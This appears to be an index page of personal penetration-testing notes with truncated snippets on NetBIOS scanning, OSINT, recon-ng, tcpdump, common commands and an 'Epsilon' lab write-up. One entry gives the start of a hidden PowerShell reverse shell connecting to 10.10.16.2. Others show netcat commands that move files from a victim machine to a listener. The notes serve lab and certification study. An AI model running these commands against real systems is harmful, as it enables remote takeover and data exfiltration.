Shuciran Pentesting Notes

NETBIOS (tcp-139)

NBTSCAN nbtscan -r 10.11.1.0/24

Social Media

Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

Recon-ng

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...

Domain Enumeration Gathering

Security Headers Analyze HTTP response headers and provide basic analysis of the target site’s security posture Security Headers SSL Server Test Analyzes a server’s SSL/TLS configuration and compa...

Powershell Reverse Shell

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Tcpdump

Read a pcap -r read a file sudo tcpdump -r password_cracking_filtered.pcap Capture traffic -i choose interface sudo tcpdump -i tun0 icmp Filter by src/dst host tcpdump -n <src/dst> host 1...

Netcat File Transfer

Transfer File Output the exit of the file towards the netcat listener on the victim machine: type .\out.txt | .\nc.exe -nv 10.10.16.2 443 Then redirect the traffic towards the destination file: nc...

Netcat File Transfer

Transfer File Output the exit of the file towards the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe Then redirect the traffic to...

Common Commands

mkdir mkdir -p {content,exploits,nmap} Reload zsh Useful command to reload zsh when it is modified (alias, keys, etc.): source ~/.zshrc Pyenv pyenv install <version> pyenv versions pyenv gl...

Epsilon (Medium)

Content Git Source retrieve with GitHacker AWS Enumeration Lambda Function Enumeration Authentication Bypass Abusing JWT Server Side Template Injection (SSTI) Tar Symlink Exploitati...